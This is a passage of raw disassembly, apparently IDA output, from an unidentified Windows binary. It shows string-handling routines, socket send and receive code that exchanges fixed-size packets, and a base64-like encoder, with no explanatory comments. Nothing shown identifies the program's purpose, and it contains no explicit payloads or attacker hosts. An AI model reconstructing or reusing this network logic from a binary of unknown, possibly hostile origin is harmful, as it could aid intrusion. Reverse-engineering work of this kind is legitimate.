lea ecx, [ebp+var_8]
call sub_40E7A0
lea ecx, [ebp+var_28]
call sub_40E7A0
lea ecx, [ebp+var_30]
call sub_40E7A0
push edi
lea eax, [ebp+var_848]
push 41h
push eax
call sub_41E5F0
add esp, 0Ch
push 400h
lea eax, [ebp+var_848]
push eax
lea ecx, [ebp+var_18]
call sub_40E8B5
lea ecx, [ebp+var_18]
call sub_40E841
push 2
push offset dword_433060
lea ecx, [ebp+var_18]
call sub_40E8B5
push [ebp+var_1C]
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_18]
call sub_40E8B5
lea ecx, [ebp+var_18]
call sub_40E916
lea ecx, [ebp+var_20]
call sub_40E7A0
push [ebp+var_14]
mov eax, [ebp+var_18]
push eax
lea ecx, [ebp+var_10]
mov [ebp+var_C], esi
mov [ebp+var_10], esi
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E7B9
lea ecx, [ebp+var_18]
call sub_40E7A0
push offset dword_43305C
lea ecx, [ebp+var_8]
call sub_40E8E9
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_8]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7B9
lea ecx, [ebp+var_10]
call sub_40E7A0
push offset dword_433058
lea ecx, [ebp+var_10]
call sub_40E8E9
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_10]
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E7B9
lea ecx, [ebp+var_8]
call sub_40E7A0
push offset dword_43304C
lea ecx, [ebp+var_8]
call sub_40E8E9
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_8]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7B9
lea ecx, [ebp+var_10]
call sub_40E7A0
push offset asc_433048 ; "`"
lea ecx, [ebp+var_40]
call sub_40E8E9
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_40]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7A0
mov ecx, [ebp+var_40]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov ecx, [ebp+var_3C]
pop edi
jmp short loc_40ECC6
; ---------------------------------------------------------------------------
loc_40ECC1: ; CODE XREF: sub_40E971+1F�j
; sub_40E971+2D�j
mov eax, [ebp+arg_0]
mov [eax], edx
loc_40ECC6: ; CODE XREF: sub_40E971+34E�j
pop esi
mov [eax+4], ecx
pop ebx
leave
retn
sub_40E971 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECCD proc near ; CODE XREF: sub_40ED91+A1�p
; sub_40ED91+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
push eax
push 0
lea eax, [ebp+var_10C]
push eax
xor edi, edi
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42B21C ; select
cmp eax, edi
jnz short loc_40ED34
lea eax, [ebp+var_10C]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jnz short loc_40ED38
loc_40ED34: ; CODE XREF: sub_40ECCD+54�j
xor eax, eax
jmp short loc_40ED48
; ---------------------------------------------------------------------------
loc_40ED38: ; CODE XREF: sub_40ECCD+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_444064 ; recv
loc_40ED48: ; CODE XREF: sub_40ECCD+69�j
pop edi
pop esi
leave
retn
sub_40ECCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED4C proc near ; CODE XREF: sub_40ED91+81�p
; sub_40ED91+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_444234 ; htonl
push 0
mov [ebp+var_4], eax
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_4441A0 ; send
cmp eax, 4
jz short loc_40ED76
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40ED76: ; CODE XREF: sub_40ED4C+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4441A0 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40ED4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED91 proc near ; CODE XREF: sub_40EE6B+48�p
; seg000:0040F828�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_41E5D3
mov esi, eax
test esi, esi
pop ecx
jnz short loc_40EDBA
xor al, al
jmp loc_40EE66
; ---------------------------------------------------------------------------
loc_40EDBA: ; CODE XREF: sub_40ED91+20�j
push ebx
push 0
push esi
call sub_41E5F0
push 2Fh
push offset dword_43F7EC
push esi
call sub_41F400
push 8
lea eax, [esi+31h]
push offset dword_43F7E0
push eax
mov [esi+2Fh], di
call sub_41F400
push edi
push [ebp+arg_4]
lea ebx, [esi+3Bh]
push ebx
mov [esi+39h], di
call sub_41F400
push 6
push offset dword_4D50CC
add ebx, edi
push ebx
call sub_41F400
mov ebx, [ebp+arg_0]
push 85h
push offset dword_43F758
push ebx
call sub_40ED4C
add esp, 48h
test al, al
jnz short loc_40EE22
loc_40EE1E: ; CODE XREF: sub_40ED91+B5�j
xor bl, bl
jmp short loc_40EE5D
; ---------------------------------------------------------------------------
loc_40EE22: ; CODE XREF: sub_40ED91+8B�j
push 0
mov edi, 100h
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40ECCD
push [ebp+var_4]
push esi
push ebx
call sub_40ED4C
add esp, 1Ch
test al, al
jz short loc_40EE1E
push 0
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40ECCD
add esp, 10h
mov bl, 1
loc_40EE5D: ; CODE XREF: sub_40ED91+8F�j
push esi
call sub_41E2A1
pop ecx
mov al, bl
loc_40EE66: ; CODE XREF: sub_40ED91+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40ED91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE6B proc near ; CODE XREF: seg000:0040F80E�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_43F820
push [ebp+arg_0]
call ds:dword_42B210 ; send
cmp eax, 48h
jnz short loc_40EEA6
push 0
push 20h
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40ECCD
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40EEA6
cmp [ebp+var_20], 82h
jz short loc_40EEAA
loc_40EEA6: ; CODE XREF: sub_40EE6B+1B�j
; sub_40EE6B+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40EEAA: ; CODE XREF: sub_40EE6B+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40ED91
add esp, 0Ch
leave
retn
sub_40EE6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEBD proc near ; CODE XREF: sub_40F47A+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
shl eax, 3
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40EED8
fadd ds:dbl_433088
loc_40EED8: ; CODE XREF: sub_40EEBD+13�j
fmul ds:dbl_433080
call sub_41FE38
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40EEF3
fadd ds:dbl_433088
loc_40EEF3: ; CODE XREF: sub_40EEBD+2E�j
fst [ebp+var_8]
push ecx
fmul ds:dbl_433078
push ecx
fstp [esp+10h+var_10]
call sub_41FCC0
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_41FE38
inc eax
leave
retn
sub_40EEBD endp
; =============== S U B R O U T I N E =======================================
sub_40EF15 proc near ; CODE XREF: sub_40F28C+B�p
; sub_40F3AB+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_40EF25
mov edx, [eax]
jmp short loc_40EF27
; ---------------------------------------------------------------------------
loc_40EF25: ; CODE XREF: sub_40EF15+A�j
mov edx, eax
loc_40EF27: ; CODE XREF: sub_40EF15+E�j
cmp [esp+4+arg_0], edx
jb short loc_40EF43
cmp esi, 10h
jb short loc_40EF34
mov eax, [eax]
loc_40EF34: ; CODE XREF: sub_40EF15+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_40EF43
mov al, 1
jmp short loc_40EF45
; ---------------------------------------------------------------------------
loc_40EF43: ; CODE XREF: sub_40EF15+16�j
; sub_40EF15+28�j
xor al, al
loc_40EF45: ; CODE XREF: sub_40EF15+2C�j
pop esi
retn 4
sub_40EF15 endp
; =============== S U B R O U T I N E =======================================
sub_40EF49 proc near ; CODE XREF: sub_40EF65+40�p
; sub_40EFAE+5F�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40EF5B
mov ecx, [ecx+4]
jmp short loc_40EF5E
; ---------------------------------------------------------------------------
loc_40EF5B: ; CODE XREF: sub_40EF49+B�j
add ecx, 4
loc_40EF5E: ; CODE XREF: sub_40EF49+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_40EF49 endp
; =============== S U B R O U T I N E =======================================
sub_40EF65 proc near ; CODE XREF: sub_40F024+AD�p
; sub_40F10C+3E�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40EF98
cmp dword ptr [esi+18h], 10h
jb short loc_40EF98
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_40EF90
push [esp+8+arg_4]
push edi
push eax
call sub_41F400
add esp, 0Ch
loc_40EF90: ; CODE XREF: sub_40EF65+1B�j
push edi
call sub_41FEAD
pop ecx
pop edi
loc_40EF98: ; CODE XREF: sub_40EF65+8�j
; sub_40EF65+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40EF49
pop esi
retn 8
sub_40EF65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EFAE proc near ; CODE XREF: sub_40F31C+33�p
; sub_40F31C+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_40EFC2
call sub_4297E3
loc_40EFC2: ; CODE XREF: sub_40EFAE+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_40EFCF
mov [ebp+arg_4], eax
loc_40EFCF: ; CODE XREF: sub_40EFAE+1C�j
cmp [ebp+arg_4], 0
jbe short loc_40F012
push ebx
mov ebx, [esi+18h]
cmp ebx, 10h
lea ecx, [esi+4]
jb short loc_40EFE5
mov edx, [ecx]
jmp short loc_40EFE7
; ---------------------------------------------------------------------------
loc_40EFE5: ; CODE XREF: sub_40EFAE+31�j
mov edx, ecx
loc_40EFE7: ; CODE XREF: sub_40EFAE+35�j
cmp ebx, 10h
pop ebx
jb short loc_40EFEF
mov ecx, [ecx]
loc_40EFEF: ; CODE XREF: sub_40EFAE+3D�j
sub eax, [ebp+arg_4]
add edx, edi
add edx, [ebp+arg_4]
push eax
push edx
add ecx, edi
push ecx
call sub_41F980
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 0Ch
push eax
mov ecx, esi
call sub_40EF49
loc_40F012: ; CODE XREF: sub_40EFAE+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_40EFAE endp
; ---------------------------------------------------------------------------
dw 6Ah
dd 42E8016Ah, 0C3FFFFFFh
; =============== S U B R O U T I N E =======================================
sub_40F024 proc near ; CODE XREF: sub_40F10C+1D�p
mov eax, offset a0jc ; "¸0¦C"
call sub_420364
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+8]
push edi
or esi, 0Fh
cmp esi, 0FFFFFFFEh
mov edi, ecx
mov [ebp-10h], esp
mov [ebp-18h], edi
jbe short loc_40F04C
mov esi, [ebp+8]
jmp short loc_40F071
; ---------------------------------------------------------------------------
loc_40F04C: ; CODE XREF: sub_40F024+21�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_40F071
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_40F071
lea esi, [edx+ecx]
loc_40F071: ; CODE XREF: sub_40F024+26�j
; sub_40F024+3F�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push eax
call sub_41FEB2
pop ecx
mov ebx, eax
jmp short loc_40F0AA
; ---------------------------------------------------------------------------
byte_40F083 db 8Bh ; DATA XREF: seg001:0043A604�o
dd 45890845h, 65894008h, 45C650F0h, 1BE802FCh, 8900010Eh
dd 0B859EC45h, 40F0A1h, 0E87D8BC3h, 8B08758Bh
db 5Dh, 0ECh
; ---------------------------------------------------------------------------
loc_40F0AA: ; CODE XREF: sub_40F024+5D�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_40F0CB
cmp dword ptr [edi+18h], 10h
jb short loc_40F0BB
mov eax, [edi+4]
jmp short loc_40F0BE
; ---------------------------------------------------------------------------
loc_40F0BB: ; CODE XREF: sub_40F024+90�j
lea eax, [edi+4]
loc_40F0BE: ; CODE XREF: sub_40F024+95�j
push dword ptr [ebp+0Ch]
push eax
push ebx
call sub_41F400
add esp, 0Ch
loc_40F0CB: ; CODE XREF: sub_40F024+8A�j
push 0
push 1
mov ecx, edi
call sub_40EF65
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40EF49
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_40F024 endp
; ---------------------------------------------------------------------------
byte_40F0F7 db 8Bh ; DATA XREF: seg001:0043A5F4�o
dd 0F633E84Dh, 0E8016A56h, 0FFFFFE61h, 78E85656h, 0CC000112h
; =============== S U B R O U T I N E =======================================
sub_40F10C proc near ; CODE XREF: sub_40F16A+48�p
; sub_40F1FF+26�p ...
arg_0 = dword ptr 4
arg_8 = byte ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_40F11E
call sub_42987E
loc_40F11E: ; CODE XREF: sub_40F10C+B�j
cmp [esi+18h], edi
jnb short loc_40F130
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_40F024
jmp short loc_40F15D
; ---------------------------------------------------------------------------
loc_40F130: ; CODE XREF: sub_40F10C+15�j
cmp [esp+4+arg_8], 0
jz short loc_40F151
cmp edi, 10h
jnb short loc_40F151
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_40F145
mov eax, edi
loc_40F145: ; CODE XREF: sub_40F10C+35�j
push eax
push 1
mov ecx, esi
call sub_40EF65
jmp short loc_40F15D
; ---------------------------------------------------------------------------
loc_40F151: ; CODE XREF: sub_40F10C+29�j
; sub_40F10C+2E�j
test edi, edi
jnz short loc_40F15D
push edi
mov ecx, esi
call sub_40EF49
loc_40F15D: ; CODE XREF: sub_40F10C+22�j
; sub_40F10C+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_40F10C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F16A proc near ; CODE XREF: sub_40F28C+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, [ebp+arg_4]
cmp [ebx+14h], edi
mov esi, ecx
jnb short loc_40F182
call sub_4297E3
loc_40F182: ; CODE XREF: sub_40F16A+11�j
mov eax, [ebx+14h]
sub eax, edi
cmp eax, [ebp+arg_8]
jnb short loc_40F18F
mov [ebp+arg_8], eax
loc_40F18F: ; CODE XREF: sub_40F16A+20�j
or eax, 0FFFFFFFFh
sub eax, [esi+14h]
cmp eax, [ebp+arg_8]
ja short loc_40F1A1
mov ecx, esi
call sub_42987E
loc_40F1A1: ; CODE XREF: sub_40F16A+2E�j
cmp [ebp+arg_8], 0
jbe short loc_40F1F6
mov edi, [esi+14h]
add edi, [ebp+arg_8]
push 0
push edi
mov ecx, esi
call sub_40F10C
test al, al
jz short loc_40F1F6
cmp dword ptr [ebx+18h], 10h
jb short loc_40F1C6
mov ebx, [ebx+4]
jmp short loc_40F1C9
; ---------------------------------------------------------------------------
loc_40F1C6: ; CODE XREF: sub_40F16A+55�j
add ebx, 4
loc_40F1C9: ; CODE XREF: sub_40F16A+5A�j
cmp dword ptr [esi+18h], 10h
jb short loc_40F1D4
mov eax, [esi+4]
jmp short loc_40F1D7
; ---------------------------------------------------------------------------
loc_40F1D4: ; CODE XREF: sub_40F16A+63�j
lea eax, [esi+4]
loc_40F1D7: ; CODE XREF: sub_40F16A+68�j
mov ecx, [ebp+arg_4]
push [ebp+arg_8]
add ebx, ecx
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_41F400
add esp, 0Ch
push edi
mov ecx, esi
call sub_40EF49
loc_40F1F6: ; CODE XREF: sub_40F16A+3B�j
; sub_40F16A+4F�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40F16A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F1FF proc near ; CODE XREF: sub_40F47A+111�p
; sub_40F47A+142�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
or eax, 0FFFFFFFFh
mov esi, ecx
sub eax, [esi+14h]
cmp eax, ebx
ja short loc_40F216
call sub_42987E
loc_40F216: ; CODE XREF: sub_40F1FF+10�j
test ebx, ebx
jbe short loc_40F258
push edi
mov edi, [esi+14h]
push 0
add edi, ebx
push edi
mov ecx, esi
call sub_40F10C
test al, al
jz short loc_40F257
cmp dword ptr [esi+18h], 10h
jb short loc_40F239
mov eax, [esi+4]
jmp short loc_40F23C
; ---------------------------------------------------------------------------
loc_40F239: ; CODE XREF: sub_40F1FF+33�j
lea eax, [esi+4]
loc_40F23C: ; CODE XREF: sub_40F1FF+38�j
push [esp+8+arg_8]
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_40E6FA
add esp, 0Ch
push edi
mov ecx, esi
call sub_40EF49
loc_40F257: ; CODE XREF: sub_40F1FF+2D�j
pop edi
loc_40F258: ; CODE XREF: sub_40F1FF+19�j
mov eax, esi
pop esi
pop ebx
retn 8
sub_40F1FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F25F proc near ; CODE XREF: sub_40F47A+33�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push edi
mov edi, [esi+14h]
cmp edi, eax
ja short loc_40F287
cmp [esi+18h], eax
jz short loc_40F287
push 1
push eax
call sub_40F10C
test al, al
jz short loc_40F287
push edi
mov ecx, esi
call sub_40EF49
loc_40F287: ; CODE XREF: sub_40F25F+D�j
; sub_40F25F+12�j ...
pop edi
pop esi
retn 4
sub_40F25F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F28C proc near ; CODE XREF: sub_40F440+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
mov esi, ecx
call sub_40EF15
test al, al
jz short loc_40F2BE
cmp dword ptr [esi+18h], 10h
jb short loc_40F2AB
mov eax, [esi+4]
jmp short loc_40F2AE
; ---------------------------------------------------------------------------
loc_40F2AB: ; CODE XREF: sub_40F28C+18�j
lea eax, [esi+4]
loc_40F2AE: ; CODE XREF: sub_40F28C+1D�j
push [ebp+arg_4]
sub ebx, eax
push ebx
push esi
mov ecx, esi
call sub_40F16A
jmp short loc_40F316
; ---------------------------------------------------------------------------
loc_40F2BE: ; CODE XREF: sub_40F28C+12�j
or eax, 0FFFFFFFFh
sub eax, [esi+14h]
cmp eax, [ebp+arg_4]
ja short loc_40F2D0
mov ecx, esi
call sub_42987E
loc_40F2D0: ; CODE XREF: sub_40F28C+3B�j
cmp [ebp+arg_4], 0
jbe short loc_40F314
push edi
mov edi, [esi+14h]
add edi, [ebp+arg_4]
push 0
push edi
mov ecx, esi
call sub_40F10C
test al, al
jz short loc_40F313
cmp dword ptr [esi+18h], 10h
jb short loc_40F2F6
mov eax, [esi+4]
jmp short loc_40F2F9
; ---------------------------------------------------------------------------
loc_40F2F6: ; CODE XREF: sub_40F28C+63�j
lea eax, [esi+4]
loc_40F2F9: ; CODE XREF: sub_40F28C+68�j
push [ebp+arg_4]
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_41F400
add esp, 0Ch
push edi
mov ecx, esi
call sub_40EF49
loc_40F313: ; CODE XREF: sub_40F28C+5D�j
pop edi
loc_40F314: ; CODE XREF: sub_40F28C+48�j
mov eax, esi
loc_40F316: ; CODE XREF: sub_40F28C+30�j
pop esi
pop ebx
pop ebp
retn 8
sub_40F28C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F31C proc near ; CODE XREF: sub_40F3AB+2B�p
; sub_40F41A+1B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_40F334
call sub_4297E3
loc_40F334: ; CODE XREF: sub_40F31C+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_40F344
mov esi, [ebp+arg_8]
loc_40F344: ; CODE XREF: sub_40F31C+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_40F362
push 0FFFFFFFFh
add esi, eax
push esi
call sub_40EFAE
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_40EFAE
jmp short loc_40F3A2
; ---------------------------------------------------------------------------
loc_40F362: ; CODE XREF: sub_40F31C+2C�j
push 0
push esi
call sub_40F10C
test al, al
jz short loc_40F3A2
cmp dword ptr [edi+18h], 10h
jb short loc_40F379
mov edi, [edi+4]
jmp short loc_40F37C
; ---------------------------------------------------------------------------
loc_40F379: ; CODE XREF: sub_40F31C+56�j
add edi, 4
loc_40F37C: ; CODE XREF: sub_40F31C+5B�j
cmp dword ptr [ebx+18h], 10h
jb short loc_40F387
mov eax, [ebx+4]
jmp short loc_40F38A
; ---------------------------------------------------------------------------
loc_40F387: ; CODE XREF: sub_40F31C+64�j
lea eax, [ebx+4]
loc_40F38A: ; CODE XREF: sub_40F31C+69�j
mov ecx, [ebp+arg_4]
push esi
add edi, ecx
push edi
push eax
call sub_41F400
add esp, 0Ch
push esi
mov ecx, ebx
call sub_40EF49
loc_40F3A2: ; CODE XREF: sub_40F31C+44�j
; sub_40F31C+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_40F31C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3AB proc near ; CODE XREF: sub_40F45D+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_40EF15
test al, al
jz short loc_40F3DD
cmp dword ptr [esi+18h], 10h
jb short loc_40F3CA
mov eax, [esi+4]
jmp short loc_40F3CD
; ---------------------------------------------------------------------------
loc_40F3CA: ; CODE XREF: sub_40F3AB+18�j
lea eax, [esi+4]
loc_40F3CD: ; CODE XREF: sub_40F3AB+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_40F31C
jmp short loc_40F414
; ---------------------------------------------------------------------------
loc_40F3DD: ; CODE XREF: sub_40F3AB+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_40F10C
test al, al
jz short loc_40F412
cmp dword ptr [esi+18h], 10h
jb short loc_40F3F8
mov eax, [esi+4]
jmp short loc_40F3FB
; ---------------------------------------------------------------------------
loc_40F3F8: ; CODE XREF: sub_40F3AB+46�j
lea eax, [esi+4]
loc_40F3FB: ; CODE XREF: sub_40F3AB+4B�j
push [ebp+arg_4]
push edi
push eax
call sub_41F400
add esp, 0Ch
push [ebp+arg_4]
mov ecx, esi
call sub_40EF49
loc_40F412: ; CODE XREF: sub_40F3AB+40�j
mov eax, esi
loc_40F414: ; CODE XREF: sub_40F3AB+30�j
pop edi
pop esi
pop ebp
retn 8
sub_40F3AB endp
; =============== S U B R O U T I N E =======================================
sub_40F41A proc near ; CODE XREF: sub_40F47A+15C�p
; sub_429712+26�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40EF49
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_40F31C
mov eax, esi
pop esi
retn 4
sub_40F41A endp
; =============== S U B R O U T I N E =======================================
sub_40F440 proc near ; CODE XREF: sub_40F47A+128�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_41E1C0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40F28C
pop esi
retn 4
sub_40F440 endp
; =============== S U B R O U T I N E =======================================
sub_40F45D proc near ; CODE XREF: sub_40F6AF+17�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_41E1C0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40F3AB
pop esi
retn 4
sub_40F45D endp
; =============== S U B R O U T I N E =======================================
sub_40F47A proc near ; CODE XREF: sub_40F5F6+23�p
var_40 = qword ptr -40h
mov eax, offset aTjc ; "¸T¦C"
call sub_420364
sub esp, 2Ch
push edi
xor edi, edi
push edi
lea ecx, [ebp-38h]
mov [ebp-1Ch], edi
mov dword ptr [ebp-20h], 0Fh
call sub_40EF49
push dword ptr [ebp+10h]
mov [ebp-4], edi
call sub_40EEBD
pop ecx
push eax
lea ecx, [ebp-38h]
call sub_40F25F
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40F5CF
push ebx
mov ebx, [ebp+10h]
push esi
loc_40F4C3: ; CODE XREF: sub_40F47A+14D�j
cmp dword ptr [ebp+10h], 3
jb short loc_40F4CE
push 3
loc_40F4CB: ; CODE XREF: sub_40F47A+5C�j
pop ebx
jmp short loc_40F4E1
; ---------------------------------------------------------------------------
loc_40F4CE: ; CODE XREF: sub_40F47A+4D�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40F4D8
push 2
jmp short loc_40F4CB
; ---------------------------------------------------------------------------
loc_40F4D8: ; CODE XREF: sub_40F47A+58�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40F4E1
xor ebx, ebx
inc ebx
loc_40F4E1: ; CODE XREF: sub_40F47A+52�j
; sub_40F47A+62�j
test ebx, ebx
mov [ebp-1Ch], ebx
fild dword ptr [ebp-1Ch]
jge short loc_40F4F1
fadd ds:dbl_433088
loc_40F4F1: ; CODE XREF: sub_40F47A+6F�j
fmul ds:dbl_433090
push ecx
push ecx
fstp [esp+40h+var_40]
call sub_4203C0
pop ecx
pop ecx
call sub_41FE38
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_40F527
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea edi, [ebp-10h]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40F527: ; CODE XREF: sub_40F47A+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
add [ebp+0Ch], ebx
sub [ebp+10h], ebx
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
and dl, 3
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and cl, 3
and dl, 0Fh
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
xor esi, esi
cmp eax, edi
mov [ebp-11h], cl
